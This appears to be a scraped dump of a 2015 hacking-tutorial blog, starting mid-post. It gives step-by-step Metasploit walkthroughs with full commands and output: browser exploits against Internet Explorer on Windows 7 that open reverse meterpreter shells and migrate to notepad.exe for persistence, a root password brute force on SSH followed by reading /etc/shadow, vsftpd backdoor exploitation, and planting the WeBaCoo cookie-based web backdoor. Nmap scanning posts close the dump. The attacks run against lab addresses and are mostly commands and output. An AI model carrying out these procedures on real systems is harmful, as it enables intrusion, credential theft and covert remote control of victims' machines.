[*] 192.168.122.10 ms11_003_ie_css_import - Sending CSS<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending CSS<br />
[*] Sending stage (770048 bytes) to 192.168.122.10<br />
<span style="color: red;">[*] Session ID 1 <span style="color: black;">(192.168.122.115:4444 -> 192.168.122.10:49219) processing InitialAutoRunScript 'migrate -f'</span></span><br />
[*] Current server process: <span style="color: red;">iexplore.exe</span> (2744)<br />
[*] Spawning <span style="color: red;">notepad.exe </span>process to migrate to<br />
[+<span style="color: red;"><span style="color: black;">] Migrating to</span> 3376</span><br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL<br />
[*] Sending stage (770048 bytes) to 192.168.122.10<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/favicon.ico"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending CSS<br />
[+] Successfully migrated to process <br />
<span style="color: red;">[*] Session ID 2 <span style="color: black;">(192.168.122.115:444</span>4 -> 192.168.122.10:49221) processing InitialAutoRunScript 'migrate -f'</span><br />
[*] Current server process: <span style="color: red;">iexplore.exe</span> (3404)<br />
[*] Spawning <span style="color: red;">notepad.exe</span> process to migrate to<br />
[+] Migrating to 3532<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL<br />
[*] Sending stage (770048 bytes) to 192.168.122.10<br />
[+] Successfully migrated to process <br />
[*] <span style="color: red;">Session ID 3</span> (192.168.122.115:4444 -> 192.168.122.10:49224) processing InitialAutoRunScript 'migrate -f'<br />
[*] Current server process: <span style="color: red;">iexplore.exe</span> (3664)<br />
[*] Spawning <span style="color: red;">notepad.exe </span>process to migrate to<br />
[+] Migrating to 3808<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL<br />
[*] Sending stage (770048 bytes) to 192.168.122.10<br />
[+] Successfully migrated to process <br />
[*] <span style="color: red;">Session ID 4 </span>(192.168.122.115:4444 -> 192.168.122.10:49226) processing InitialAutoRunScript 'migrate -f'<br />
[*] Current server process: <span style="color: red;">iexplore.exe</span> (3848)<br />
[*] Spawning <span style="color: red;">notepad.exe</span> process to migrate to<br />
[+] Migrating to 3984<br />
[+] Successfully migrated to process <br />
<br />
As we can see above, the InitialAutoRunScript executes a migrate -f command which migrates the payload from iexplorer.exe to notepad.exe. This step is essential for a persistent connectivity. Even if the user closes the browser, still the conection will be alive as we have migrated to another process.<br />
<br />
9) <span style="color: blue;">View the sessions.</span><br />
msf exploit(ms11_003_ie_css_import) > <b>sessions -i</b><br />
<br />
Active sessions<br />
===============<br />
<br />
Id Type Information Connection<br />
-- ---- ----------- ----------<br />
1 meterpreter x86/win32 shabbir-PC\ali @ SHABBIR-PC 192.168.122.115:4444 -> 192.168.122.10:49219 (192.168.122.10)<br />
2 meterpreter x86/win32 shabbir-PC\ali @ SHABBIR-PC 192.168.122.115:4444 -> 192.168.122.10:49221 (192.168.122.10)<br />
3 meterpreter x86/win32 shabbir-PC\ali @ SHABBIR-PC 192.168.122.115:4444 -> 192.168.122.10:49224 (192.168.122.10)<br />
4 meterpreter x86/win32 shabbir-PC\ali @ SHABBIR-PC 192.168.122.115:4444 -> 192.168.122.10:49226 (192.168.122.10)<br />
<br />
<br />
10) <span style="color: blue;">Connect to the remote machine.</span><br />
msf exploit(ms11_003_ie_css_import) > <b>sessions -i 1</b><br />
[*] Starting interaction with 1...<br />
<br />
meterpreter > <b>sysinfo</b><br />
Computer : SHABBIR-PC<br />
OS : Windows 7 (Build 7601, Service Pack 1).<br />
Architecture : x86<br />
System Language : en_US<br />
Meterpreter : x86/win32<br />
<br />
meterpreter ><b> getuid</b><br />
Server username: shabbir-PC\ali<br />
<br />
meterpreter > <b>shell</b><br />
Process 2704 created.<br />
Channel 1 created.<br />
Microsoft Windows [Version 6.1.7601]<br />
Copyright (c) 2009 Microsoft Corporation. All rights reserved.<br />
<br />
C:\Users\ali\Desktop></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com8tag:blogger.com,1999:blog-1164086323266606043.post-70185641523354887282015-06-20T18:16:00.000+05:302015-06-20T21:46:23.892+05:30Hack Internet Explorer 8 in Windows 7 using Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this tutorial, we will hack <span style="color: red;">Internet Explorer 8</span> in <span style="color: red;">Windows 7 Service Pack 1 (unpatched)</span> using Metasploit in Kali Linux and get a remote shell on the Windows 7 machine.<br />
<br />
This exploit works when the <b>Initialize and script ActiveX controls not marked as safe</b> setting is <b>enabled</b> in Internet Explorer.<br />
<br />
To enable the above setting, start Internet Explorer and click on <b>Tools</b> -> <b>Internet Options</b> -> <b>Security</b> -> <b>Custom</b> <b>Level</b> -> <b>Initialize and script ActiveX controls not marked as safe </b>-> <b>Enable</b>.<br />
<br />
We have the following configuration: <br />
Windows 7 IP Address: <span style="color: red;">192.168.122.10 </span><br />
Kali Linux IP Address: <span style="color: red;">192.168.122.115 </span><br />
<br />
Perform the following steps on the Kali Linux Machine<br />
<br />
1) <span style="color: blue;">Start the services.</span><br />
root@kali:~# <b>service postgresql start</b><br />
[ ok ] Starting PostgreSQL 9.1 database server: main.<br />
<br />
root@kali:~# <b>service metasploit start</b><br />
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.<br />
[ ok ] Starting Metasploit worker: worker.<br />
<br />
<br />
2) <span style="color: blue;">Start metasploit console. </span><br />
root@kali:~# <b>msfconsole</b><br />
msf ><br />
<br />
3) <span style="color: blue;">Select exploit. </span><br />
msf > <b>use exploit/windows/browser/ie_unsafe_scripting</b><br />
<br />
4) <span style="color: blue;">Select payload.<b> </b> </span><br />
msf exploit(ie_unsafe_scripting) > <b>set payload windows/meterpreter/reverse_tcp</b><br />
payload => windows/meterpreter/reverse_tcp<br />
<br />
5) <span style="color: blue;">View options. </span><br />
msf exploit(ie_unsafe_scripting) > <b>show options</b><br />
<br />
Module options (exploit/windows/browser/ie_unsafe_scripting):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
<span style="color: red;"> SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0</span><br />
<span style="color: red;"> SRVPORT 8080 yes The local port to listen on.</span><br />
SSL false no Negotiate SSL for incoming connections<br />
SSLCert no Path to a custom SSL certificate (default is randomly generated)<br />
TECHNIQUE VBS yes Delivery technique (VBS Exe Drop or PSH CMD) (accepted: VBS, Powershell)<br />
URIPATH no The URI to use for this exploit (default is random)<br />
<br />
<br />
Payload options (windows/meterpreter/reverse_tcp):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)<br />
<span style="color: red;"> LHOST yes The listen address</span><br />
<span style="color: red;"> LPORT 4444 yes The listen port</span><br />
<br />
<br />
Exploit target:<br />
<br />
Id Name<br />
-- ----<br />
0 Windows x86/x64<br />
<br />
6) <span style="color: blue;">Set options</span><br />
msf exploit(ie_unsafe_scripting) > <b>set LHOST 192.168.122.115</b><br />
LHOST => 192.168.122.115<br />
<br />
7) <span style="color: blue;">Execute the exploit. </span><br />
msf exploit(ie_unsafe_scripting) > <b>exploit</b><br />
[*] Exploit running as background job.<br />
<br />
[*] Started reverse handler on 192.168.122.115:4444 <br />
msf exploit(ie_unsafe_scripting) > [*] Using URL: http://0.0.0.0:8080/bHN7e4<br />
[*] Local IP: <i><span style="color: red;">http://192.168.122.115:8080/bHN7e4</span></i><br />
[*] Server started.<br />
<br />
<br />
8) <span style="color: blue;">User clicks on the malicious URL.</span> As we can see, a link has been generated as a result of the exploit command. This is the malicious link (<i><span style="color: red;">http://192.168.122.115:8080/bHN7e4) </span></i><span style="color: red;"><span style="color: black;">that we will have to send to our target, so that it can exploit their browser.</span></span><br />
<br />
When the user clicks on the malicious link, the browser will try to load the page, but nothing will be displayed. But you will get a remote shell on your msfconsole, as shown below.<br />
<br />
msf exploit(ie_unsafe_scripting) > [*] 192.168.122.10 ie_unsafe_scripting - Request received for /bHN7e4<br />
[*] 192.168.122.10 ie_unsafe_scripting - Sending exploit html/javascript<br />
[*] Sending stage (770048 bytes) to 192.168.122.10<br />
[*] Meterpreter session 1 opened (192.168.122.115:4444 -> 192.168.122.10:49166) at 2015-06-20 17:13:43 +0530<br />
<br />
msf exploit(ie_unsafe_scripting) > <b>sessions -i 1</b><br />
[*] Starting interaction with 1...<br />
<br />
meterpreter > <b>shell</b><br />
Process 3680 created.<br />
Channel 1 created.<br />
Microsoft Windows [Version 6.1.7601]<br />
Copyright (c) 2009 Microsoft Corporation. All rights reserved.<br />
<br />
C:\Users\shabbir\Desktop><br />
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com6tag:blogger.com,1999:blog-1164086323266606043.post-569578528579830192015-06-17T14:37:00.000+05:302015-06-20T22:01:44.489+05:30Hack SSH Server in RHEL 7 Using Metasploit in Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this tutorial, we will hack the password for 'root' user on SSH Server running in RHEL 7 using Metasploit running in Kali Linux.<br />
<br />
SSH Server Name: meru.mycompany.com<br />
SSH Server IP Address: 192.168.122.1 <br />
<br />
Perform the following steps on the Kali Linux Machine<br />
<br />
1) <span style="color: blue;">Start the services.</span><br />
root@kali:~# <b>service postgresql start</b><br />
[ ok ] Starting PostgreSQL 9.1 database server: main.<br />
<br />
root@kali:~# <b>service metasploit start</b><br />
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.<br />
[ ok ] Starting Metasploit worker: worker.<br />
<br />
<br />
2) <span style="color: blue;">Start metasploit console. </span><br />
root@kali:~# <b>msfconsole</b><br />
msf ><br />
<br />
<br />
3) <span style="color: blue;">Check database status </span><br />
msf > <b>db_status</b><br />
[*] postgresql connected to msf3<br />
<br />
<br />
4) <span style="color: blue;">Perform nmap scan through a database extension in Metasploit.</span> This scan will automatically add all the details that are found to various sections of Metasploit. <br />
msf ><b> db_nmap -sS 192.168.122.1 -p 22</b><br />
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-17 14:01 IST<br />
[*] Nmap: Nmap scan report for meru.mycompany.com (192.168.122.1)<br />
[*] Nmap: Host is up (0.0024s latency).<br />
[*] Nmap: PORT STATE SERVICE<br />
<span style="color: red;">[*] Nmap: 22/tcp open ssh</span><br />
[*] Nmap: MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)<br />
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds<br />
<b><br /></b>5) <span style="color: blue;">Search for module.</span><br />
msf > <b>search ssh</b><br />
<span style="color: red;">auxiliary/scanner/ssh/ssh_login normal SSH Login Check Scanner</span><br />
<br />
6) <span style="color: blue;">Select the module.</span><br />
msf > <b>use auxiliary/scanner/ssh/ssh_login</b><br />
<br />
7) <span style="color: blue;">View options.</span> <br />
msf auxiliary(ssh_login) > <b>show options</b><br />
<br />
Module options (auxiliary/scanner/ssh/ssh_login):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
BLANK_PASSWORDS false no Try blank passwords for all users<br />
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5<br />
DB_ALL_CREDS false no Try each user/password couple stored in the current database<br />
DB_ALL_PASS false no Add all passwords in the current database to the list<br />
DB_ALL_USERS false no Add all users in the current database to the list<br />
PASSWORD no A specific password to authenticate with<br />
<span style="color: red;"> PASS_FILE no File containing passwords, one per line</span><br />
<span style="color: red;"> RHOSTS yes The target address range or CIDR identifier</span><br />
RPORT 22 yes The target port<br />
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host<br />
THREADS 1 yes The number of concurrent threads<br />
<span style="color: red;"> USERNAME no A specific username to authenticate as</span><br />
USERPASS_FILE no File containing users and passwords separated by space, one pair per line<br />
USER_AS_PASS false no Try the username as the password for all users<br />
USER_FILE no File containing usernames, one per line<br />
VERBOSE true yes Whether to print output for all attempts<br />
<br />
8) <span style="color: blue;">Set options. </span><br />
msf auxiliary(ssh_login) > <b>set RHOSTS 192.168.122.1</b><br />
RHOSTS => 192.168.122.1<br />
<br />
msf auxiliary(ssh_login) > <b>set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt</b><br />
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt<br />
<br />
msf auxiliary(ssh_login) > <b>set USERNAME root</b><br />
USERNAME => root<br />
<br />
9) <span style="color: blue;">Execute the module</span><br />
msf auxiliary(ssh_login) > <b>run</b><br />
<br />
[*] 192.168.122.1:22 SSH - Starting bruteforce<br />
[-] 192.168.122.1:22 SSH - Failed: 'root:123456'<br />
[-] 192.168.122.1:22 SSH - Failed: 'root:12345'<br />
[-] 192.168.122.1:22 SSH - Failed: 'root:123456789'<br />
[-] 192.168.122.1:22 SSH - Failed: 'root:password'<br />
[-] 192.168.122.1:22 SSH - Failed: 'root:iloveyou'<br />
<span style="color: red;">[+] 192.168.122.1:22 SSH - Success: 'root:<i><b>adminpasswd</b></i>' 'uid=0(root) gid=0(root) </span>groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux meru.mycompany.com 3.10.0-123.el7.x86_64 #1 SMP Mon Jun 30 12:09:22 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux '<br />
[*] Scanned 1 of 1 hosts (100% complete)<br />
[*] Auxiliary module execution completed<br />
<br />
msf auxiliary(ssh_login) > <b>id</b><br />[*] exec: id<br />uid=0(root) gid=0(root) groups=0(root)<br /><br />
msf auxiliary(ssh_login) > <b>cat /etc/shadow</b><br />
<br />
<br />
<br />
As seen above, we have got a root shell on the victim machine.<br />
<br />
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com8tag:blogger.com,1999:blog-1164086323266606043.post-32404283590601322682015-06-17T12:46:00.000+05:302015-06-21T08:39:50.625+05:30Metasploit: Using database to store results<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
It is always a better approach to store the results of penetration testing in a database. This helps us build a knowledge base about the <span style="color: blue;"><span style="color: red;">hosts</span> <span style="color: black;">scanned</span></span> , <span style="color: blue;"><span style="color: red;">services</span> <span style="color: black;">running on the hosts, and <span style="color: red;">vulnerabilities</span> found on the hosts.</span></span> Metasploit uses postgresql as the default database.<br />
<br /><br />
1) <span style="color: blue;">Start the services.</span><br />
root@kali:~# <b>service postgresql start</b><br />
[ ok ] Starting PostgreSQL 9.1 database server: main.<br />
<br />
root@kali:~# <b>service metasploit start</b><br />
Configuring Metasploit...<br />
Creating metasploit database user 'msf3'...<br />
Creating metasploit database 'msf3'...<br />
insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5).<br />
insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6).<br />
[ ok ] Starting Metasploit rpc server: prosvc.<br />
[ ok ] Starting Metasploit web server: thin.<br />
[ ok ] Starting Metasploit worker: worker.<br />
<br />
<br />
2) <span style="color: blue;">Start metasploit console. </span><br />
root@kali:~# <b>msfconsole</b><br />
msf ><br />
<br />
<br />
3) <span style="color: blue;">Check database status </span><br />
msf > <b>db_status</b><br />
[*] postgresql connected to msf3<br />
<br />
<br />
4) <span style="color: blue;">Perform nmap scan through a database extension in Metasploit.</span> This scan will automatically add all the details that are found to various sections of Metasploit. <br />
msf > <b>db_nmap -sV 192.168.122.73</b><br />
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-17 11:12 IST<br />
[*] Nmap: Nmap scan report for 192.168.122.73<br />
[*] Nmap: Host is up (0.00030s latency).<br />
[*] Nmap: Not shown: 977 closed ports<br />
[*] Nmap: PORT STATE SERVICE VERSION<br />
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4<br />
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)<br />
[*] Nmap: 23/tcp open telnet Linux telnetd<br />
[*] Nmap: 25/tcp open smtp Postfix smtpd<br />
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2<br />
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)<br />
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)<br />
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)<br />
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)<br />
[*] Nmap: 512/tcp open exec?<br />
[*] Nmap: 513/tcp open login<br />
[*] Nmap: 514/tcp open tcpwrapped<br />
[*] Nmap: 1099/tcp open rmiregistry GNU Classpath grmiregistry<br />
[*] Nmap: 1524/tcp open shell Metasploitable root shell<br />
[*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003)<br />
[*] Nmap: 2121/tcp open ftp ProFTPD 1.3.1<br />
[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5<br />
[*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7<br />
[*] Nmap: 5900/tcp open vnc VNC (protocol 3.3)<br />
[*] Nmap: 6000/tcp open X11 (access denied)<br />
[*] Nmap: 6667/tcp open irc Unreal ircd<br />
[*] Nmap: 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)<br />
[*] Nmap: 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1<br />
[*] Nmap: MAC Address: 00:0C:29:FA:DD:2A (VMware)<br />
[*] Nmap: Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel<br />
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .<br />
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 66.26 seconds<br />
msf > <br />
<br />
msf ><b> db_nmap -O 192.168.122.73</b><br />
<br />
<br />
4) <span style="color: blue;">Verify the hosts present in the database.</span><br />
msf > <b>hosts</b><br />
<br />
Hosts<br />
=====<br />
<br />
address mac name os_name os_flavor os_sp purpose info comments<br />
------- --- ---- ------- --------- ----- ------- ---- --------<br />
192.168.122.73 00:0c:29:fa:dd:2a Linux 2.6.X server <br />
<br />
<br />
5) <span style="color: blue;">View the services available on the hosts.</span><br />
msf > <b>services</b><br />
<br />
Services<br />
========<br />
<br />
host port proto name state info<br />
---- ---- ----- ---- ----- ----<br />
192.168.122.73 21 tcp ftp open vsftpd 2.3.4<br />
192.168.122.73 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0<br />
192.168.122.73 23 tcp telnet open Linux telnetd<br />
192.168.122.73 25 tcp smtp open Postfix smtpd<br />
192.168.122.73 53 tcp domain open ISC BIND 9.4.2<br />
192.168.122.73 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2<br />
192.168.122.73 111 tcp rpcbind open 2 RPC #100000<br />
192.168.122.73 139 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP<br />
192.168.122.73 445 tcp microsoft-ds open Samba smbd 3.X workgroup: WORKGROUP<br />
192.168.122.73 512 tcp exec open <br />
192.168.122.73 513 tcp login open <br />
192.168.122.73 514 tcp shell open <br />
192.168.122.73 1099 tcp rmiregistry open GNU Classpath grmiregistry<br />
192.168.122.73 1524 tcp ingreslock open Metasploitable root shell<br />
192.168.122.73 2049 tcp nfs open 2-4 RPC #100003<br />
192.168.122.73 2121 tcp ccproxy-ftp open ProFTPD 1.3.1<br />
192.168.122.73 3306 tcp mysql open MySQL 5.0.51a-3ubuntu5<br />
192.168.122.73 5432 tcp postgresql open PostgreSQL DB 8.3.0 - 8.3.7<br />
192.168.122.73 5900 tcp vnc open VNC protocol 3.3<br />
192.168.122.73 6000 tcp x11 open access denied<br />
192.168.122.73 6667 tcp irc open Unreal ircd<br />
192.168.122.73 8009 tcp ajp13 open Apache Jserv Protocol v1.3<br />
192.168.122.73 8180 tcp unknown open Apache Tomcat/Coyote JSP engine 1.1<br />
<br />
msf > <br />
<br />
6) <span style="color: blue;">Find and exploit 'vsftpd' vulnerability</span><br />
msf > <b>search vsftpd</b><br />
msf > <b>use exploit/unix/ftp/vsftpd_234_backdoor </b><br />
msf exploit(vsftpd_234_backdoor) > <b>show options</b><br />
msf exploit(vsftpd_234_backdoor) > <b>set RHOST 192.168.122.73</b><br />
msf exploit(vsftpd_234_backdoor) > <b>exploit</b><br />
<br />
<br />
7) <span style="color: blue;">View vulnerabilities in database</span><br />
msf > <b>vulns</b><br />
[*] Time: 2015-06-17 06:42:50 UTC Vuln: host=192.168.122.73 <span style="color: red;">name=VSFTPD v2.3.4 Backdoor Command Execution</span> refs=OSVDB-73573,URL-http://pastebin.com/AetT9sS5,URL-http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html <br />
<br />
<br />
<br />
8) <span style="color: blue;">Generate XML report.</span> <br />
msf > <b>db_export -f xml /root/report.xml</b><br />
[*] Starting export of workspace default to /root/report.xml [ xml ]...<br />
[*] >> Starting export of report<br />
[*] >> Starting export of hosts<br />
[*] >> Starting export of events<br />
[*] >> Starting export of services<br />
[*] >> Starting export of web sites<br />
[*] >> Starting export of web pages<br />
[*] >> Starting export of web forms<br />
[*] >> Starting export of web vulns<br />
[*] >> Starting export of module details<br />
[*] >> Finished export of report<br />
[*] Finished export of workspace default to /root/report.xml [ xml ]... <br />
<br />
<br />
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com1tag:blogger.com,1999:blog-1164086323266606043.post-5983051489180724162015-06-15T13:01:00.000+05:302015-06-20T23:05:28.379+05:30Web backdoor 'webacoo' in Kali Linux <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
A backdoor is any type of program that will allow a hacker to connect to a computer without going through the normal authentication process. If a hacker can get a backdoor program loaded on a computer, the hacker can then come and go at will. Backdoors generally use a covert communication channel to hide its communication from firewall and IDS.<br />
<br />
<span style="background-color: white; text-align: justify;">WeBaCoo (Web Backdoor Cookie) is a web backdoor
script-kit, which provides the hacker with a remote terminal on the web server and communicates over HTTP. WeBaCoo uses HTTP cookies as a covert communication channel. The commands to be executed on the victim server and the response are sent using encrypted cookies in HTTP request and HTTP response headers.</span><br />
<br />
<span style="background-color: white; text-align: justify;">WeBaCoo is a post exploitation tool. The hacker has to first gain access to the victim web server in order to upload the backdoor code. </span><br />
<br />
<br />
On the Kali Linux machine,perform the following steps: <br />
<br />1) Generate backdoor code<br />
root@kali:~# <b>webacoo -g -o backdoor.php</b><br />
<br />
WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit<br />
Copyright (C) 2011-2012 Anestis Bechtsoudis<br />
{ @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }<br />
<br />
<span style="color: red;">[+] Backdoor file "backdoor.php" created.</span><br />
<br />
<br />
<br />
2) Copy the file '<b>backdoor.php</b>' to the compromised web server.<br />
<br />
<br />
3) Connect to the compromised web server.<br />
root@kali:~# <b>webacoo -t -u http://meru.mycompany.com/backdoor.php</b><br />
<br />
WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit<br />
Copyright (C) 2011-2012 Anestis Bechtsoudis<br />
{ @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }<br />
<br />
[+] Connecting to remote server as...<br />
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0<br />
<br />
[*] Type 'load' to use an extension module.<br />
[*] Type ':<cmd>' to run local OS commands.<br />
[*] Type 'exit' to quit terminal.<br />
<br />
webacoo$ <b>id</b><br />
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0<br />
<br />
<br />
<br />
On the Kali Linux machine, we capture the communication with the victim web server in 'Wireshark'. To configure Wireshark, select the<b> Network Interface</b> , and <b>start</b> capture. Set filter to <b>http</b>. <br />
<br />
The below screen shot shows the HTTP request to the victim web server. We can see that the command to be executed on the victim is sent using an encrypted cookie. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigLyh_PVMVE1uzkoVNPgHlDOtonG7l9oMTRJ6RG1dBRVkbrbHhHp-fj10bMTykPBbtKSkEbJO3tPTyAhaY1fD-NsouRzp7aDbD3qTU-z38edLc1Mw4zW34hHNL0p_HEoT3boQNSx4KErEd/s1600/Screenshot+from+2015-06-15+12%253A03%253A48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="444" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigLyh_PVMVE1uzkoVNPgHlDOtonG7l9oMTRJ6RG1dBRVkbrbHhHp-fj10bMTykPBbtKSkEbJO3tPTyAhaY1fD-NsouRzp7aDbD3qTU-z38edLc1Mw4zW34hHNL0p_HEoT3boQNSx4KErEd/s640/Screenshot+from+2015-06-15+12%253A03%253A48.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
The below screen shot shows the HTTP response from the victim web server. <br />
The output of the command executed on the victim is sent using an encrypted cookie.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrYFPrZ9ZyKjpGDjD0N6DYw7AIH7Z8-zyUKr0D8QIF4FWDEcokKwpPTtmkw_H4JsB8D_lNqD5N9BT8CwryHlr_I21aKjitXFwW0Xkxg3FkWeIqQazQWCs2d0p6D_D2DvctmozImmc7oyXz/s1600/Screenshot+from+2015-06-15+12%253A00%253A52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="444" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrYFPrZ9ZyKjpGDjD0N6DYw7AIH7Z8-zyUKr0D8QIF4FWDEcokKwpPTtmkw_H4JsB8D_lNqD5N9BT8CwryHlr_I21aKjitXFwW0Xkxg3FkWeIqQazQWCs2d0p6D_D2DvctmozImmc7oyXz/s640/Screenshot+from+2015-06-15+12%253A00%253A52.png" width="640" /></a></div>
<br />
<br />
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com2tag:blogger.com,1999:blog-1164086323266606043.post-6134232253101945992015-06-14T14:49:00.000+05:302015-06-20T23:07:53.911+05:30Network Scanning using nmap<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
1) <span style="color: blue;">Identify live hosts</span> <span style="color: blue;">(ping scan)</span>. If the target(s) are on the same subnet, this command will send an ARP request to the LAN broadcast address and will determine whether the host is alive, based on the response that is received. If the target(s) are not on the same subnet, then ICMP echo requests will be used to determine if the hosts are alive. <br />
root@kali:~# <b>nmap -sn 192.168.122.1-255</b><br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-13 19:53 IST<br />
Nmap scan report for meru.mycompany.com (192.168.122.1)<br />
Host is up (0.00031s latency).<br />
MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)<br />
Nmap scan report for 192.168.122.73<br />
Host is up (0.00066s latency).<br />
MAC Address: 00:0C:29:FA:DD:2A (VMware)<br />
Nmap scan report for 192.168.122.115<br />
Host is up.<br />
Nmap done: 255 IP addresses (3 hosts up) scanned in 2.53 seconds<br />
<br />
<br />
<br />
2) <span style="color: blue;">UDP Port Scan. <span style="background-color: black;"></span></span><br />
root@kali:~# <b>nmap -sU 192.168.122.73</b><br />
<br />
PORT STATE SERVICE<br />
53/udp open domain<br />
68/udp open|filtered dhcpc<br />
69/udp open|filtered tftp<br />
111/udp open rpcbind<br />
137/udp open netbios-ns<br />
138/udp open|filtered netbios-dgm<br />
2049/udp open nfs<br />
MAC Address: 00:0C:29:FA:DD:2A (VMware)<br />
<br />
<br />
3) <span style="color: blue;">TCP Connect Scan</span>. Establishes a full TCP connection. If a connection is established, the port is determined to be open.<br />
root@kali:~# <b>nmap -sT 192.168.122.1</b><br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-13 19:33 IST<br />
Nmap scan report for meru.mycompany.com (192.168.122.1)<br />
Host is up (0.79s latency).<br />
Not shown: 981 filtered ports<br />
PORT STATE SERVICE<br />
21/tcp open ftp<br />
22/tcp open ssh<br />
25/tcp open smtp<br />
53/tcp open domain<br />
80/tcp open http<br />
<br />
<br />
3) <span style="color: blue;">TCP Stealth Scan.(SYN Scan)</span> A single SYN packet is sent to the destination port. If SYN+ACK is received, the port is assumed to be open. Logging solutions which only record established connections will not record any evidence of the scan.<br />
root@kali:~# <b>nmap -sS 192.168.122.1</b><br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-13 19:35 IST<br />
Nmap scan report for meru.mycompany.com (192.168.122.1)<br />
Host is up (0.00038s latency).<br />
Not shown: 981 filtered ports<br />
PORT STATE SERVICE<br />
21/tcp open ftp<br />
22/tcp open ssh<br />
25/tcp open smtp<br />
53/tcp open domain<br />
80/tcp open http<br />
88/tcp closed kerberos-sec<br />
<br />
<br />
<br />
4) <span style="color: blue;">Banner Grabbing</span> (with Nmap NSE)<br />
